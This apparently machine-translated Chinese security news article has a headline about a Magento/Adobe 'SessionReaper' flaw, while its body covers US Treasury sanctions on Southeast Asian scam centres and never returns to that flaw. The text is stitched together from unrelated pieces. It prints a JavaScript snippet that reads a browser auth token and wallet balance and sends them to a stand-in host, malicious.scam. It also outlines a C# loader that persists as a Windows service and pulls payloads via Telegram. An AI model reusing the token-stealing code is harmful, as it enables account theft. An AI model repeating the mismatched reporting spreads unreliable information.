Magento 和 Adobe SessionReaper 漏洞使数千家在线商店面临自动攻击

美国财政部公布了一项针对东南亚网络诈骗中心网络的全面制裁行动，这些网络在 2024 年总共从美国受害者那里窃取了超过 100 亿美元。

这些作通常伪装成合法的虚拟货币投资平台，依靠复杂的社会工程技术来诱骗用户汇款，但一旦建立信任，他们就会带着存款潜逃。

从通过强迫劳动践踏人权，到为受胁迫的经营者部署高压配额，该网络的影响力从缅甸的偏远大院延伸到柬埔寨的赌场度假村，成为犯罪中心。

这些“屠猪”骗局在大流行的最初几个月正式出现，结合了浪漫欺诈、移动消息漏洞和欺诈性区块链教程的元素，创造了一种可信回报的假象。

虚拟货币投资网站配备了模仿信誉良好的交易所的实时价格信息、SSL 证书和用户仪表板。

后端恶意软件工具包通常安装在强制招募的运营商的工作站上，促进了支付通知的自动欺骗和社交帐户接管。

美国财政部分析师发现了拦截短信一次性密码并注入合成交易确认的代码模块，使诈骗者能够以惊人的可靠性绕过双因素身份验证。

随着这些中心的规模扩大，被贩运的人——其中一些受到债务束缚的威胁——接受了培训，通过脚本对话来引导来电者，这些对话利用开源情报来个性化推销。

受害者被提示在浏览器中运行看似良性的 JavaScript 片段来“验证钱包连接”，从而在不知不觉中授予诈骗运营商访问其本地会话存储的权限。

在财政部调查期间恢复的此恶意脚本的一个示例说明了如何收集会话令牌：-

(async () => {
  const token = localStorage.getItem('auth_token');
  await fetch('https://malicious.scam/api/steal', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ token, balance: window.wallet.balance })
  });
})();

美国财政部分析师指出，该片段通过利用允许通过 JSON-RPC 接口进行远程脚本注入的浏览器扩展，绕过了常见的内容安全策略 （CSP） 限制。

坚持策略

在缅甸亚泰新城中心内，运营商部署了自定义持久性机制，以保持对受感染帐户和内部工作站的持续控制。

一个名为“BeaconYatai”的轻量级 C# 加载器嵌入到合法的视频会议工具中，以建立弹性的命令和控制通道。

安装后，BeaconYatai 将自己注册为名为“SvcUpdate”的 Windows 服务，并在启动时自动重新启动。

该服务定期轮询 Telegram API 上的伪装端点以获取加密的任务有效负载，并使用硬编码的 RSA 密钥解密它们：-

RSAParameters rsaKey = LoadKey("-----BEGIN RSA PRIVATE KEY-----...");
byte[] payload = FetchFromTelegram().Decrypt(rsaKey);
ExecutePayload(payload);

通过将社会胁迫、高级脚本漏洞和自定义恶意软件持久性交织在一起，这些诈骗中心实现了较长的正常运行时间，使财政部的制裁成为瓦解价值数百万美元的犯罪企业的关键一步。